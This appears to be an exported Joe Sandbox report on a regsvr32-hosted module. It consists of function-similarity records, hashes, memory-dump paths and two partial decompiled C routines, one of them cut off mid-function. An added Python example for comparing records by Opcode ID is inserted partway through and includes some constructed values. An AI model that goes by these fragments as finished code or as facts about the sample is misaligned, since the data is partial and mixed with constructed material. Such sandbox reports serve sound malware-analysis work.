• Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: Y
• API String ID: 0-579211002
• Opcode ID: c7ef7c05ef0c3c9f2aed6826f015ad160cfcc6abce9b29eb71b79f5d508516d5
• Instruction ID: ab86133c36dcd50802e65f4dd796bf16f81dc050f1e4dd5322194aefc575fb52
• Opcode Fuzzy Hash: c7ef7c05ef0c3c9f2aed6826f015ad160cfcc6abce9b29eb71b79f5d508516d5
• Instruction Fuzzy Hash: 4751D4715107898BDB98DF28C88A0DD3BA1FB4935CF425318ED8EA62A1D77CD849CB49
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: vOs
• API String ID: 0-1852020951
• Opcode ID: 0a3c35978ef4d06ef910e88490b5bce2e9beff051be12035b9eadbcefa2f22bf
• Instruction ID: 543ea1e47959c2442f87695b277c3bd73096d774c1a58750ca28aa6f5263c2c4
• Opcode Fuzzy Hash: 0a3c35978ef4d06ef910e88490b5bce2e9beff051be12035b9eadbcefa2f22bf
• Instruction Fuzzy Hash: 0E618EB190030E8FDB49CF68D48A5CE7FB0FB64398F204519F845A6260D7B996A4CFD5
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: *)
• API String ID: 0-1811957435
• Opcode ID: c39f41b8af2b9280dd7c00c4ba0ddd05394017a856c7f82ca50d576e38ac2643
• Instruction ID: a0a17fb8510f5e028abc751411bc9e1a88d0ba78354b6a8ab8093c3a6431f09f
• Opcode Fuzzy Hash: c39f41b8af2b9280dd7c00c4ba0ddd05394017a856c7f82ca50d576e38ac2643
• Instruction Fuzzy Hash: 9F31953061CB888FC728DF29D08556ABBE0FB99301F50472EE98AC7365DB74D805CB82
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: t
• API String ID: 0-1935021737
• Opcode ID: 783391770682b9c9d34a01018b97ccb4612aed757a5715f7015a6466eeb6abdd
• Instruction ID: 0778e4714d20bafc8421ccf47dc3d5cc009554136eeaa9536c52203ae55d573d
• Opcode Fuzzy Hash: 783391770682b9c9d34a01018b97ccb4612aed757a5715f7015a6466eeb6abdd
• Instruction Fuzzy Hash: 72319F3061DB448FE768DF2CD48516ABBE0FB96351F104A6DE9CAC7266D770D809CB82
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: __
• API String ID: 0-2267946753
• Opcode ID: 8f9b035c25ddab069e89f1d5b32d9e06551c62a3022c943f576078da68d92037
• Instruction ID: 93bfbf45f17b85160e326040b6397c7c2a175f458ae3cf35a4bd5e3b51d9cb2d
• Opcode Fuzzy Hash: 8f9b035c25ddab069e89f1d5b32d9e06551c62a3022c943f576078da68d92037
• Instruction Fuzzy Hash: 7141F07050CB848BE758DF29C58A41ABBF1FBC9304F500A2DF69A87360C775D845CB42
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: GSn
• API String ID: 0-1733515909
• Opcode ID: 120b4183c770ef369911dc760361451600c2e99f203226371e5481c8821bf4d7
• Instruction ID: 7e2b542015367d43299f0e2840bb6bcd5f07d8657efae5042f5f1f2eb10e55c5
• Opcode Fuzzy Hash: 120b4183c770ef369911dc760361451600c2e99f203226371e5481c8821bf4d7
• Instruction Fuzzy Hash: FE51D6B090038E8FDF48DF64C84A5DE7BB1FB58358F104A1DEC66A6290D3B89664CF84
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: 8=
• API String ID: 0-237953557
• Opcode ID: bb623fe5bad30cc0ccc512b27898bb82e9ca0e52d8794c79c7b053a60b518db3
• Instruction ID: 55e089b965d29060f69b03517f06cc44f090e693f79d0378968c15596d7509ef
• Opcode Fuzzy Hash: bb623fe5bad30cc0ccc512b27898bb82e9ca0e52d8794c79c7b053a60b518db3
• Instruction Fuzzy Hash: F2314930608B458BDB5CDF2CD49922ABAE1FBD9340F444A2EF58AD7365DB34D845CB82
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: K
• API String ID: 0-425913083
• Opcode ID: 2b1ae9da1385bdbe4b8d4d873491c8ef025a73cbd56fa24a9a5b2ec22b63fa4f
• Instruction ID: 88ac6e9e56aeae0fcb5bf5df5982007eba3b451921d2a4425eec00035a5a4480
• Opcode Fuzzy Hash: 2b1ae9da1385bdbe4b8d4d873491c8ef025a73cbd56fa24a9a5b2ec22b63fa4f
• Instruction Fuzzy Hash: 8841F7B180438ECFDB48CF68D8865DE7BB0FB58344F114A19F866A6250D3B8D665CF85
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: t"
• API String ID: 0-2131657386
• Opcode ID: a3a222a6e056c70518c09b2f7e5539db3b60aaf61629909d00af61b4973bd0e8
• Instruction ID: 36d53832c6f9a7caf578cc6a3a6c2fc1132eb59a751205c614d9bd4c2723c004
• Opcode Fuzzy Hash: a3a222a6e056c70518c09b2f7e5539db3b60aaf61629909d00af61b4973bd0e8
• Instruction Fuzzy Hash: BB41E77180070D8BDF48DF64C48A0DE7FB0FB083A8F65621DE91AB6290D3B89585CF99
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: gLv
• API String ID: 0-1669999040
• Opcode ID: d372408e4ccfa21733394c795309bb98bbbf8ce06b144d4f85a8e8de8872e02b
• Instruction ID: 0bfcdb268aba54e7961a9f14f1050a9e6a0e778082ccd11b295b4716e1d0ff7c
• Opcode Fuzzy Hash: d372408e4ccfa21733394c795309bb98bbbf8ce06b144d4f85a8e8de8872e02b
• Instruction Fuzzy Hash: 9241B0B180078E8FDF84CF64C88A4DE7BB0FB18358F104619F866A6290D3B89665CF85
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: 2|
• API String ID: 0-4112153497
• Opcode ID: c8d3a13c8ccf64a8a58613b82b71848b75fef30a95d8cbfed718dfac3d203234
• Instruction ID: de1df218c1e16543bbbfeb007247a8c9561616116d6de820abf10d60c9a7b67f
• Opcode Fuzzy Hash: c8d3a13c8ccf64a8a58613b82b71848b75fef30a95d8cbfed718dfac3d203234
• Instruction Fuzzy Hash: 2831E2715083808FD768DF28C58A54BBBF1FBC6704F50891DE6CA8A260DB76D849CB03
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: v)v
• API String ID: 0-2248367734
• Opcode ID: 2bcb51d8d69df24c6edafa72637552a2373937b3983906909be42b2c69647502
• Instruction ID: 406f7a9d7ebbe22d4eb3c54054534ba3458e77760000bd4b01ba55a4239761b8
• Opcode Fuzzy Hash: 2bcb51d8d69df24c6edafa72637552a2373937b3983906909be42b2c69647502
• Instruction Fuzzy Hash: F731FFB0D107189BDF88DFB8D98A4DDBBF0BB48308F50826DD816B6290D7785A45CF68
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: b
• API String ID: 0-1908338681
• Opcode ID: dddb38d3eca3b718f76d068eb3649ef697cdbcc6fe538854f7f679c62e5ae1f4
• Instruction ID: 17bdd88a76ea742b17f3307574b3be47e3e99a9a8e87152f7e628db9e49eb398
• Opcode Fuzzy Hash: dddb38d3eca3b718f76d068eb3649ef697cdbcc6fe538854f7f679c62e5ae1f4
• Instruction Fuzzy Hash: 09318BB55187808BD748DF28C08651ABBE1BBCC308F404B1DF8CAEB2A1D778D645CB4A
Uniqueness
Uniqueness Score: -1.00%

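The per-function records above only become useful when they are compared across functions and across samples: a shared API String ID points at functions built around the same API/string combination, and a shared Opcode ID is a function that survived unchanged into another dump. The following Python, added here as an example and not part of the Joe Sandbox report or its tooling, parses this record layout into rows, lists API String IDs that appear in more than one function (the two "Y" entries in this section are such a pair), and measures Opcode ID overlap against a second dump. The second dump, the "zz" record and the `_record` renderer are constructed for the example; that "API String ID" is derived from the "API ID" and "String ID" fields is an assumption taken from the field names.

```python
"""Parse Joe Sandbox per-function "Similarity" records (the text layout in this
section) and compare two dumps by Opcode ID.

Added example for this page, not Joe Sandbox code. SAMPLE_A copies the two "Y"
records from the page; SAMPLE_B is a constructed second sample that shares one
function with it. Field semantics are assumed from the field names.
"""
import re
from collections import defaultdict
from dataclasses import dataclass

# A field line in the dump looks like "• Opcode ID: <hex>"; tolerate other bullets.
FIELD_RE = re.compile(r"^\s*[•\-*]\s*(?P<key>[^:]+):\s*(?P<value>.*)$")

# Opcode IDs copied from the two "Y" records in this section.
OPCODE_Y1 = "c7ef7c05ef0c3c9f2aed6826f015ad160cfcc6abce9b29eb71b79f5d508516d5"
OPCODE_Y2 = "ecd3080a44302933cb34d055b18508fc771149b61013eb4241d4c9c3597933d5"
# Hypothetical Opcode ID for the constructed second sample (not from the page).
OPCODE_OTHER = "f" * 64


def _record(string_id, api_string_id, opcode_id, instruction_id, instr_fuzzy):
    """Render one record in the report's own layout (constructed test input)."""
    return (
        "Strings\nMemory Dump Source\n"
        "• Source File: 0000000B.00000002.334740049.0000000000F41000."
        "00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false\n"
        "Joe Sandbox IDA Plugin\n"
        "• Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd\n"
        "Yara matches\nSimilarity\n"
        "• API ID:\n"
        f"• String ID: {string_id}\n"
        f"• API String ID: {api_string_id}\n"
        f"• Opcode ID: {opcode_id}\n"
        f"• Instruction ID: {instruction_id}\n"
        f"• Opcode Fuzzy Hash: {opcode_id}\n"
        f"• Instruction Fuzzy Hash: {instr_fuzzy}\n"
        "Uniqueness\n\nUniqueness Score: -1.00%\n\n"
    )


SAMPLE_A = (
    _record("Y", "0-579211002", OPCODE_Y1,
            "ab86133c36dcd50802e65f4dd796bf16f81dc050f1e4dd5322194aefc575fb52",
            "4751D4715107898BDB98DF28C88A0DD3BA1FB4935CF425318ED8EA62A1D77CD849CB49")
    + _record("Y", "0-579211002", OPCODE_Y2,
              "3905b0f92365bb91672009248d65bd91db3d35b841bf4746a7ab911bc2e22770",
              "A33199B0628781AFD78CDF28D49692EBBE1BBD9314F816A1DF9868B350D774D404CB42")
)
# Constructed: one function reused from SAMPLE_A plus one hypothetical "zz" function.
SAMPLE_B = (
    _record("Y", "0-579211002", OPCODE_Y2,
            "3905b0f92365bb91672009248d65bd91db3d35b841bf4746a7ab911bc2e22770",
            "A33199B0628781AFD78CDF28D49692EBBE1BBD9314F816A1DF9868B350D774D404CB42")
    + _record("zz", "0-1", OPCODE_OTHER, "0" * 64, "0" * 70)
)


@dataclass(frozen=True)
class FunctionRecord:
    string_id: str
    api_string_id: str
    opcode_id: str
    instruction_id: str
    opcode_fuzzy: str
    instruction_fuzzy: str
    uniqueness: str


def parse_records(text):
    """Split a dump into FunctionRecords; a record closes at its 'Uniqueness Score:' line."""
    records, fields = [], {}
    for raw in text.splitlines():
        line = raw.strip()
        m = FIELD_RE.match(line)
        if m:
            fields[m.group("key").strip()] = m.group("value").strip()
        elif line.startswith("Uniqueness Score:"):
            records.append(FunctionRecord(
                string_id=fields.get("String ID", ""),
                api_string_id=fields.get("API String ID", ""),
                opcode_id=fields.get("Opcode ID", ""),
                instruction_id=fields.get("Instruction ID", ""),
                opcode_fuzzy=fields.get("Opcode Fuzzy Hash", ""),
                instruction_fuzzy=fields.get("Instruction Fuzzy Hash", ""),
                uniqueness=line.split(":", 1)[1].strip(),
            ))
            fields = {}
    return records


def shared_api_string_ids(records):
    """Map each API String ID seen in more than one function to those functions' Opcode IDs."""
    groups = defaultdict(list)
    for r in records:
        groups[r.api_string_id].append(r.opcode_id)
    return {k: v for k, v in groups.items() if len(v) > 1}


def opcode_overlap(records_a, records_b):
    """Opcode IDs present in both dumps, and the Jaccard similarity of the two ID sets."""
    ids_a = {r.opcode_id for r in records_a}
    ids_b = {r.opcode_id for r in records_b}
    union, shared = ids_a | ids_b, ids_a & ids_b
    return shared, (len(shared) / len(union) if union else 0.0)


if __name__ == "__main__":
    a, b = parse_records(SAMPLE_A), parse_records(SAMPLE_B)
    print(f"{len(a)} records in A, {len(b)} in B")
    print("API String IDs shared within A:", shared_api_string_ids(a))
    shared, j = opcode_overlap(a, b)
    print(f"Opcode IDs shared between A and B: {sorted(shared)} (jaccard={j:.2f})")
```

Run against a whole report section, the same parser gives one row per function; the Jaccard figure over Opcode IDs is a quick way to see how much of one dump's code survived unchanged into another before looking at the fuzzy hashes for near matches.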
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Y
                                                                                                • API String ID: 0-579211002
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: 0}
• API String ID: 0-2955618701
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: 6N
• API String ID: 0-1503784733
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: S}
• API String ID: 0-4277866985
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: H-
• API String ID: 0-1037293833
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: u*AR
• API String ID: 0-611844632
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: g*`
• API String ID: 0-1142845859
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: 5$
• API String ID: 0-3756733592
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: n*=
• API String ID: 0-1578461029
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 100%
#include <stdint.h>
#include <windows.h>

/* Decompiled by the Joe Sandbox IDA plugin from the regsvr32-hosted module
   (image base 0x180000000, see the Memory Dump Source below). The routine
   calls GetProcessHeap, stores the incoming __rax value in a global, and
   returns a value whose low byte is 1 when __rax was non-zero; the upper
   bytes are whatever remained of the heap handle. Function and variable
   names are the decompiler's own. */
signed int E0000000118000A878(long long __rax) {
        signed int _t3;

        _t3 = (signed int)(uintptr_t)GetProcessHeap();   /* HANDLE narrowed to 32 bits by the decompiler */
        *(long long *)0x800227e8 = __rax;                /* write to the global at 0x800227e8 */
        /* Same precedence as the decompiler output, parenthesised for clarity:
           (_t3 & 0xffffff00) | (__rax != 0) */
        return (_t3 & 0xffffff00) | (__rax != 0x00000000);
}

0x18000a87c
0x18000a885
0x18000a893

APIs
Memory Dump Source
• Source File: 0000000B.00000002.334858582.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 0000000B.00000002.334853389.0000000180000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.334870999.0000000180016000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.334904837.0000000180021000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.334912376.0000000180023000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_180000000_regsvr32.jbxd
Similarity
• API ID: HeapProcess
• String ID:
• API String ID: 54951025-0
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 8a1468b82f3cc8c6cef3d943e654abe810b4fd3ed5837763d1554f5f0f2f8fb4
                                                                                                • Instruction ID: 124113779f55a6214a16fe4700ffc9823aeb8cbbdb01547d5848501d90628a66
                                                                                                • Opcode Fuzzy Hash: 8a1468b82f3cc8c6cef3d943e654abe810b4fd3ed5837763d1554f5f0f2f8fb4
                                                                                                • Instruction Fuzzy Hash: 48814C70D48709EFCB58DFA8C49599EBBF1FB44344F00856EE849EB290DB749A09CB81
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: a0216f555e37351bb33d44e999a90ae45b4d35870442341544a959e5100640a4
                                                                                                • Instruction ID: b3f5c45655cc8d5e8ef9424793abf69025d125d6ba6e8555c60b0c825c62c0da
                                                                                                • Opcode Fuzzy Hash: a0216f555e37351bb33d44e999a90ae45b4d35870442341544a959e5100640a4
                                                                                                • Instruction Fuzzy Hash: D781067151074D9BCF88CF28C8C99DD7BB0FB483A8FA56218FC0AA6254D778D885CB84
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 7b26294f0f9f3284694c45c8b9595d0348109ce62e475cb7d6409abe9a76976a
                                                                                                • Instruction ID: 641d634edd96660e6cac1e32f2d0086c161f83afc6606be24e6829f5d626f89d
                                                                                                • Opcode Fuzzy Hash: 7b26294f0f9f3284694c45c8b9595d0348109ce62e475cb7d6409abe9a76976a
                                                                                                • Instruction Fuzzy Hash: 90612170A1464C8BDF2CDF78D4962AD3BE1FB44314F20613DEC669A2A6D774D90ACB44
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 06da107516d47c143558e8aa98c820ad7c0c85d3c2a152159cfcced41356a87b
                                                                                                • Instruction ID: 608a528a8df6c5a99b24e920b9bf38b04cda737a827493a8346bf13d65ee6966
                                                                                                • Opcode Fuzzy Hash: 06da107516d47c143558e8aa98c820ad7c0c85d3c2a152159cfcced41356a87b
                                                                                                • Instruction Fuzzy Hash: F5710970508789CBDBF9CF24C8896DE7BE4FB88704F10461DE9998B2A0DB749649CF41
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334858582.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                 • Associated: 0000000B.00000002.334853389.0000000180000000.00000002.00000001.01000000.00000009.sdmp
                                                                                                 • Associated: 0000000B.00000002.334870999.0000000180016000.00000002.00000001.01000000.00000009.sdmp
                                                                                                 • Associated: 0000000B.00000002.334904837.0000000180021000.00000004.00000001.01000000.00000009.sdmp
                                                                                                 • Associated: 0000000B.00000002.334912376.0000000180023000.00000002.00000001.01000000.00000009.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_180000000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 24e3c0c76af823433cf272c9c4a9b61f0c82801c6157a6d7b247b40a6cf50061
                                                                                                • Instruction ID: 322fdb5d9cbd24f261f2202f975b2bd3e56ab6ee9c72a1ae6d0c4d2aba79015f
                                                                                                • Opcode Fuzzy Hash: 24e3c0c76af823433cf272c9c4a9b61f0c82801c6157a6d7b247b40a6cf50061
                                                                                                • Instruction Fuzzy Hash: F8411561F66BD947FF43DA7A5812BB00A00AFA77C0E41E312FD0B77B52EB28455A8200
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: ab1c614082465e9adf873fcd8bb0e59269149d5aae34c8c546b648bb5ab83c2f
                                                                                                • Instruction ID: db62923c8b734c63de9883f7b743f2adf2acdfb02386a77fe2934a1ecf67413f
                                                                                                • Opcode Fuzzy Hash: ab1c614082465e9adf873fcd8bb0e59269149d5aae34c8c546b648bb5ab83c2f
                                                                                                • Instruction Fuzzy Hash: 6351E470518788CBDBBADF24C8996D97BB0FB58304F90861DD84E8E290DB785749DB41
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 56%
                                                                                                			E00000001180006818(signed int __edx, void* __edi, void* __esp, long long __rbx, signed long long*** __rcx, long long __rsi) {
                                                                                                				void* _t24;
                                                                                                				int _t26;
                                                                                                				signed int _t51;
                                                                                                				void* _t52;
                                                                                                				signed long long _t66;
                                                                                                				signed long long _t74;
                                                                                                				signed long long _t76;
                                                                                                				signed long long _t77;
                                                                                                				signed int* _t90;
                                                                                                				signed long long _t95;
                                                                                                				signed long long _t96;
                                                                                                				signed long long _t98;
                                                                                                				signed long long _t104;
                                                                                                				long long _t115;
                                                                                                				void* _t117;
                                                                                                				void* _t120;
                                                                                                				signed long long* _t123;
                                                                                                				signed long long _t124;
                                                                                                				signed long long _t126;
                                                                                                				signed long long _t129;
                                                                                                				signed long long*** _t132;
                                                                                                
                                                                                                				_t52 = __edi;
                                                                                                				_t51 = __edx;
                                                                                                				 *((long long*)(_t117 + 8)) = __rbx;
                                                                                                				 *((long long*)(_t117 + 0x10)) = _t115;
                                                                                                				 *((long long*)(_t117 + 0x18)) = __rsi;
                                                                                                				_t66 =  *((intOrPtr*)(__rcx));
                                                                                                				_t132 = __rcx;
                                                                                                				_t90 =  *_t66;
                                                                                                				if (_t90 == 0) goto 0x800069ac;
                                                                                                				_t124 =  *0x80021010; // 0xeaed15642a89
                                                                                                				_t111 = _t124 ^  *_t90;
                                                                                                				asm("dec eax");
                                                                                                				_t74 = _t124 ^ _t90[4];
                                                                                                				asm("dec ecx");
                                                                                                				asm("dec eax");
                                                                                                				if ((_t124 ^ _t90[2]) != _t74) goto 0x8000691e;
